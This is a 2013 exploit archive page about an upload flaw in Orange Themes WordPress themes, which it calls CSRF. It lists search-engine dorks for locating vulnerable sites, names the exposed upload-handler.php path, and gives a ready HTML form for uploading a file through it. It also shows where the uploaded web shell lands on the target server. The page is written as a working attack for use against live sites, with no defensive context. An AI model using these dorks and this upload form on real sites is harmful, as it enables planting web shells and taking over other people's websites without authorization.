what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Orange Cross Site Request Forgery

WordPress Orange Cross Site Request Forgery
Posted Dec 1, 2013
Authored by Jje Incovers

WordPress Orange theme suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | bf2d5bac0f9af8cfb2860a43db73f319bd483af0a0b90a27d8a17840bb743f5e

WordPress Orange Cross Site Request Forgery

Change Mirror Download
#Title : Wordpress Orange Themes CSRF File Upload Vulnerability
#Author : Jje Incovers
#Date : 01/12/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://www.orange-themes.com/
#Download : http://www.orange-themes.com/portfolio/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Scanning Theme : [ Agritourismo , Forca , Grandis , Legatus , Reganto , Sportimo , Piccione , Bulteno , Coloris , Botanica , Project 10 , Pinword , Rockstar , Kernel , Bordeaux , Radial , Oxygen , Ray Of Light , Gadgetine ] -theme

#Dork :
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


File Access :

http://site-target/wp-content/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php

Note :
Script CSRF equate with dork you use

########################################
#Greetz : 0day-id.com | newbie-security.or.id | SANJUNGAN JIWA
#Thanks : Akira | Xie Log | - SANJUNGAN JIWA
########################################

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    8 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    7 Files
  • 29
    Oct 29th
    17 Files
  • 30
    Oct 30th
    39 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close